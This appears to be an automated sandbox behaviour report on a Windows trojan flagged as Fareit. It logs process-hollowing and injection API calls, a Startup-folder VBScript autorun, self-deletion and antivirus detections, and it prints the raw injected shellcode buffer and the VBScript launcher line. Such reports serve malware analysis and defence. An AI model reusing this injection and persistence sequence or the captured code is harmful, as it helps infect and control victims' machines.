Allocates execute permission to another process indicative of possible code injection (1 个事件)
Time & API Arguments Status Return Repeated
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
Installs itself for autorun at Windows startup (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Deletes executed files from disk (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
Creates a thread using NtQueueApcThread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 3044 created a thread in remote process 2760
Time & API Arguments Status Return Repeated
1619513303.139681
NtQueueApcThread
thread_handle: 0x0000011c
process_identifier: 2760
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
Potential code injection by writing to the memory of another process (2 个事件)
Time & API Arguments Status Return Repeated
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000b0000
success 1 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe" webseT xbB = creatEoBJEcT("WsCript.ShEll") XBB.run """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x000c0000
success 1 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (18 个事件)
Process injection Process 2868 called NtSetContextThread to modify thread in remote process 2404
Process injection Process 3144 called NtSetContextThread to modify thread in remote process 3220
Process injection Process 3396 called NtSetContextThread to modify thread in remote process 3464
Process injection Process 3648 called NtSetContextThread to modify thread in remote process 3716
Process injection Process 4048 called NtSetContextThread to modify thread in remote process 1320
Process injection Process 3084 called NtSetContextThread to modify thread in remote process 3236
Process injection Process 3440 called NtSetContextThread to modify thread in remote process 3520
Process injection Process 3736 called NtSetContextThread to modify thread in remote process 1664
Process injection Process 3780 called NtSetContextThread to modify thread in remote process 3320
Time & API Arguments Status Return Repeated
1619517161.451375
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2404
success 0 0
1619517175.0145
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3220
success 0 0
1619517181.857
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3464
success 0 0
1619517188.357875
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3716
success 0 0
1619517196.13925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1320
success 0 0
1619517205.029125
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3236
success 0 0
1619517213.826625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3520
success 0 0
1619517219.09225
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1664
success 0 0
1619517224.717875
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3320
success 0 0
Resumed a suspended thread in a remote process potentially indicative of process injection (18 个事件)
Process injection Process 2868 resumed a thread in remote process 2404
Process injection Process 3144 resumed a thread in remote process 3220
Process injection Process 3396 resumed a thread in remote process 3464
Process injection Process 3648 resumed a thread in remote process 3716
Process injection Process 4048 resumed a thread in remote process 1320
Process injection Process 3084 resumed a thread in remote process 3236
Process injection Process 3440 resumed a thread in remote process 3520
Process injection Process 3736 resumed a thread in remote process 1664
Process injection Process 3780 resumed a thread in remote process 3320
Time & API Arguments Status Return Repeated
1619517162.217375
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2404
success 0 0
1619517175.6395
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3220
success 0 0
1619517182.764
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3464
success 0 0
1619517188.889875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3716
success 0 0
1619517197.12325
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1320
success 0 0
1619517205.982125
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3236
success 0 0
1619517214.310625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3520
success 0 0
1619517219.48225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1664
success 0 0
1619517225.873875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3320
success 0 0
Executed a process and injected code into it, probably while unpacking (50 out of 77 个事件)
Time & API Arguments Status Return Repeated
1619513303.139681
CreateProcessInternalW
thread_identifier: 2772
thread_handle: 0x0000011c
process_identifier: 2760
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000b0000
success 1 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe" webseT xbB = creatEoBJEcT("WsCript.ShEll") XBB.run """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x000c0000
success 1 0
1619517160.498125
CreateProcessInternalW
thread_identifier: 2636
thread_handle: 0x000000d0
process_identifier: 2868
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619517161.279375
CreateProcessInternalW
thread_identifier: 2544
thread_handle: 0x0000011c
process_identifier: 2404
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517161.279375
NtUnmapViewOfSection
process_identifier: 2404
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517161.295375
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2404
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517161.435375
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517161.451375
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2404
success 0 0
1619517162.217375
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2404
success 0 0
1619517162.389375
CreateProcessInternalW
thread_identifier: 2616
thread_handle: 0x00000120
process_identifier: 2060
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 2404 20490703
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517173.82625
CreateProcessInternalW
thread_identifier: 3148
thread_handle: 0x00000214
process_identifier: 3144
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000218
inherit_handles: 0
success 1 0
1619517174.8425
CreateProcessInternalW
thread_identifier: 3224
thread_handle: 0x0000011c
process_identifier: 3220
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517174.8425
NtUnmapViewOfSection
process_identifier: 3220
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517174.8575
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3220
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517174.9985
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517175.0145
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3220
success 0 0
1619517175.6395
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3220
success 0 0
1619517176.3575
CreateProcessInternalW
thread_identifier: 3284
thread_handle: 0x00000120
process_identifier: 3280
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3220 20504140
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517179.826375
CreateProcessInternalW
thread_identifier: 3400
thread_handle: 0x00000148
process_identifier: 3396
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000014c
inherit_handles: 0
success 1 0
1619517181.639
CreateProcessInternalW
thread_identifier: 3468
thread_handle: 0x0000011c
process_identifier: 3464
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517181.654
NtUnmapViewOfSection
process_identifier: 3464
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517181.67
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3464
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517181.857
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517181.857
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3464
success 0 0
1619517182.764
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3464
success 0 0
1619517183.404
CreateProcessInternalW
thread_identifier: 3528
thread_handle: 0x00000120
process_identifier: 3524
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3464 20511250
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517186.420875
CreateProcessInternalW
thread_identifier: 3652
thread_handle: 0x00000134
process_identifier: 3648
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000138
inherit_handles: 0
success 1 0
1619517188.264875
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x0000011c
process_identifier: 3716
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517188.264875
NtUnmapViewOfSection
process_identifier: 3716
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517188.279875
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3716
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517188.357875
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517188.357875
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3716
success 0 0
1619517188.889875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3716
success 0 0
1619517189.248875
CreateProcessInternalW
thread_identifier: 3780
thread_handle: 0x00000120
process_identifier: 3776
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3716 20517375
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517195.420625
CreateProcessInternalW
thread_identifier: 4052
thread_handle: 0x00000190
process_identifier: 4048
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000194
inherit_handles: 0
success 1 0
1619517196.02925
CreateProcessInternalW
thread_identifier: 1880
thread_handle: 0x0000011c
process_identifier: 1320
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517196.02925
NtUnmapViewOfSection
process_identifier: 1320
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517196.04525
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 1320
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517196.13925
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517196.13925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1320
success 0 0
1619517197.12325
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1320
success 0 0
1619517197.73225
CreateProcessInternalW
thread_identifier: 1300
thread_handle: 0x00000120
process_identifier: 1688
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 1320 20525609
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517202.26425
CreateProcessInternalW
thread_identifier: 2288
thread_handle: 0x0000014c
process_identifier: 3084
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000150
inherit_handles: 0
success 1 0
1619517204.592125
CreateProcessInternalW
thread_identifier: 3252
thread_handle: 0x0000011c
process_identifier: 3236
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517204.592125
NtUnmapViewOfSection
process_identifier: 3236
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517204.701125
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3236
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517205.014125
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34266717
FireEye Generic.mg.5adb65b33594aa52
McAfee Fareit-FPQ!5ADB65B33594
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/DelfInject.ali2000015
